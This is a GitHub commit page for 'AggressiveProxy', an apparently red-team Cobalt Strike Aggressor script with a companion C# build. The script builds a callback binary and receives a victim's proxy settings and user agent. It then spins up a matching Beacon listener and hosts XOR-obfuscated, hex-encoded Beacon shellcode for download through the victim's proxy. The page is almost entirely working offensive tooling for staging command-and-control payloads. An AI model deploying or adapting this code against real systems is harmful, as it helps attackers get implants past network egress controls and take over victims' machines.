Skip to content

Commit 57428ea

Browse files
leftpleftp
committed
Initial Commit
0 parents  commit 57428ea

File tree

12 files changed

+2207
-0
lines changed

12 files changed

+2207
-0
lines changed

.gitignore

Lines changed: 405 additions & 0 deletions
Large diffs are not rendered by default.

AggressiveProxy.cna

Lines changed: 215 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,215 @@
1+
global('$selected_listener $proxy_handler_url');
2+
3+
$msbuild = "/Library/Frameworks/Mono.framework/Versions/Current/Commands/msbuild";
4+
5+
menubar("Proxy Handler", "proxy_handler");
6+
7+
popup proxy_handler {
8+
item "&Start Handler" {
9+
start_handler();
10+
}
11+
item "&Stop Handler" {
12+
stop_handler();
13+
}
14+
item "&Clean-up hosted content" {
15+
clean_site_contents();
16+
}
17+
}
18+
19+
sub start_handler {
20+
local('$dialog');
21+
if($selected_listener) {
22+
show_message("[AggressiveProxy] ERROR: Already started...");
23+
exit();
24+
}
25+
$dialog = dialog("Proxy Handler Generation", %(listener => "", checkurl => "/proxy", responseContent => "ok"), &start_handler_Callback);
26+
drow_listener_stage($dialog, "listener", "Listener: ");
27+
drow_text($dialog, "checkurl", "Check URL: ");
28+
drow_text($dialog, "responseContent", "Expected Response Content: ");
29+
dbutton_action($dialog, "Start & Build binary");
30+
dialog_show($dialog);
31+
}
32+
33+
sub build_letmeout {
34+
local('$url $responseContent $handle $data $destination $buildver $build');
35+
$url = $1;
36+
$responseContent = $2;
37+
38+
println($url);
39+
$handle = openf(script_resource("LetMeOutSharp/LetMeOutSharp/Program_template.cs"));
40+
$data = readb($handle, -1);
41+
closef($handle);
42+
43+
$data = strrep($data, "%C2URL%", $url);
44+
$data = strrep($data, "%RESPONSE%", $responseContent);
45+
46+
$destination = openf(">".script_resource("LetMeOutSharp/LetMeOutSharp/Program.cs"));
47+
writeb($destination,$data);
48+
closef($destination);
49+
$buildver = "Release"; # "Release" or "Debug"
50+
51+
println("[AggressiveProxy] INFO: Using msbuild: $msbuild");
52+
$build = exec($msbuild . " -m -t:Rebuild -p:Configuration=" . $buildver . " -p:NoWarn=0168 " . script_resource("LetMeOutSharp/LetMeOutSharp.sln"));
53+
wait($build);
54+
# println(readAll($build)); # remove
55+
closef($build);
56+
println("[AggressiveProxy] INFO: The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe"));
57+
}
58+
59+
sub start_handler_Callback {
60+
local('%info $ssl $checkurl $responseContent');
61+
if($selected_listener) {
62+
show_message("[AggressiveProxy] ERROR: Already started...");
63+
exit();
64+
}
65+
66+
clean_site_contents();
67+
println("[AggressiveProxy] INFO: Start serving...");
68+
if ($3['listener'] eq "") {
69+
show_message("[AggressiveProxy] ERROR: No listener specified!");
70+
exit();
71+
}
72+
73+
%info = listener_info($3['listener']);
74+
75+
if(%info['payload'] ne "windows/beacon_http/reverse_http" && %info['payload'] ne "windows/beacon_https/reverse_https")
76+
{
77+
show_message("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
78+
elog("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
79+
println("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
80+
exit();
81+
}
82+
83+
$selected_listener = copy(%info);
84+
println("[AggressiveProxy] INFO: Base listener is: $selected_listener['name']");
85+
86+
$selected_listener['name'] = 'agproxy';
87+
$selected_listener['status'] = $null;
88+
$ssl = false;
89+
90+
if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
91+
println("[AggressiveProxy] INFO: Using HTTPS");
92+
$ssl = true;
93+
}
94+
95+
$checkurl = $3['checkurl'];
96+
if(left($checkurl,1) ne "/") {
97+
println("[AggressiveProxy] WARNING: Url needs to start with /. Adding /.");
98+
$checkurl = "/" . $checkurl;
99+
}
100+
$responseContent = $3['responseContent'];
101+
102+
$proxy_handler_url = $checkurl;
103+
$url = site_host($selected_listener['host'], $selected_listener['port'], $checkurl, $responseContent, "text/plain", "Proxy Shellcode Handler", $ssl);
104+
build_letmeout($url, $responseContent);
105+
}
106+
107+
sub stop_handler {
108+
if($selected_listener) {
109+
println("[AggressiveProxy] INFO: Stopping...");
110+
clean_site_contents();
111+
$selected_listener = $null;
112+
}
113+
}
114+
115+
sub clean_site_contents {
116+
# Cleanup site contents
117+
local('$type $key $value $description');
118+
println("[AggressiveProxy] INFO: Cleaning site contents...");
119+
foreach $key => $value (sites()){
120+
$type = $value['Type'];
121+
$description = $value['Description'];
122+
if($type eq "page" && $description eq "Proxy Shellcode Handler") {
123+
site_kill($value['Port'], $value['URI']);
124+
}
125+
if($type eq "page" && $description eq "Proxy enabled shellcode") {
126+
site_kill($value['Port'], $value['URI']);
127+
}
128+
}
129+
}
130+
131+
println("[AggressiveProxy] INFO: Serving you...");
132+
133+
on web_hit {
134+
135+
local('$temp_listener_options $b64proxy $b64useragent $is64 $proxy $useragent $data $hexdata $payload $listener_name $arch $proxyshellcodeurl $variant');
136+
137+
if($selected_listener) {
138+
if ($2 eq $proxy_handler_url) {
139+
println("[AggressiveProxy] INFO: Proxy handler URL: $proxy_handler_url");
140+
println("[AggressiveProxy] INFO: Visit in the proxy handler URL from: $3");
141+
$b64proxy = $8['a'];
142+
$b64useragent = $8['b'];
143+
$is64 = $8['c'];
144+
$proxy = base64_decode($b64proxy);
145+
$useragent = base64_decode($b64useragent);
146+
$variant = "";
147+
if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36") {
148+
# Chrome
149+
$variant = "chrome";
150+
} else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51") {
151+
# Edge
152+
$variant = "edge";
153+
} else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0") {
154+
# Firefox
155+
$variant = "firefox";
156+
} else {
157+
# default
158+
$variant = "default";
159+
}
160+
println("[AggressiveProxy] INFO: The proxy received is: $proxy");
161+
println("[AggressiveProxy] INFO: User-agent: $useragent");
162+
println("[AggressiveProxy] INFO: Variant to use: $variant");
163+
164+
$temp_listener_options = copy($selected_listener);
165+
$temp_listener_options['name'] = $null;
166+
$temp_listener_options['payload'] = $null;
167+
168+
if($proxy) {
169+
if(right($proxy,1) eq "/")
170+
{
171+
$proxy = left($proxy,-1); #COBALT BUG with slash
172+
}
173+
$temp_listener_options['proxy'] = $proxy;
174+
} else {
175+
println("[AggressiveProxy] INFO: Using direct connectivity")
176+
$temp_listener_options['proxy'] = "*direct*";
177+
}
178+
179+
$arch = "x64";
180+
if($is64 eq "0") {
181+
$arch = "x86";
182+
}
183+
184+
$temp_listener_options['profile'] = $variant;
185+
$proxyshellcodeurl = $b64proxy . base64_encode($variant) . base64_encode($arch);
186+
$listener_name = "agproxy-rand" . rand(10000);
187+
188+
println("[AggressiveProxy] INFO: Using payload for: $selected_listener['payload']");
189+
listener_create_ext($listener_name, $selected_listener['payload'], $temp_listener_options); # This will log a java.lang.RuntimeException: Another Beacon listener exists on your cobalt console
190+
println("[AggressiveProxy] INFO: Started temp listener: $listener_name");
191+
192+
when("listeners", lambda({
193+
local('$data $xordata $hexdata $ssl');
194+
println("[AggressiveProxy] INFO: Generating & hosting new payload \($listener_name - $arch\)");
195+
$data = artifact_payload($listener_name, "raw", $arch);
196+
$xordata = str_xor($data, chr(42));
197+
$hexdata = transform($xordata, "hex");
198+
$ssl = false;
199+
if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
200+
println("[AggressiveProxy] INFO: Using HTTPS");
201+
$ssl = true;
202+
}
203+
println("[AggressiveProxy] INFO: Shellcode length: " . strlen($hexdata));
204+
println("[AggressiveProxy] INFO: Hosting payload at: /$proxyshellcodeurl")
205+
site_host($selected_listener['host'], $selected_listener['port'], "/$proxyshellcodeurl", "$hexdata", "text/plain", "Proxy enabled shellcode", $ssl);
206+
listener_delete($listener_name);
207+
208+
209+
}, $proxyshellcodeurl => $proxyshellcodeurl, $listener_name => $listener_name, $arch => $arch));
210+
}
211+
} else {
212+
elog("[AggressiveProxy] WARNING: Not started yet");
213+
println("[AggressiveProxy] WARNING: Not started yet");
214+
}
215+
}

LetMeOutSharp.sln

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
2+
Microsoft Visual Studio Solution File, Format Version 12.00
3+
# Visual Studio 15
4+
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LetMeOutSharp", "LetMeOutSharp\LetMeOutSharp.csproj", "{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}"
5+
EndProject
6+
Global
7+
GlobalSection(SolutionConfigurationPlatforms) = preSolution
8+
Debug|anycpu = Debug|anycpu
9+
Release|anycpu = Release|anycpu
10+
EndGlobalSection
11+
GlobalSection(ProjectConfigurationPlatforms) = postSolution
12+
{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.ActiveCfg = Debug|anycpu
13+
{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.Build.0 = Debug|anycpu
14+
{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.ActiveCfg = Release|anycpu
15+
{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.Build.0 = Release|anycpu
16+
EndGlobalSection
17+
EndGlobal

0 commit comments

Comments
 (0)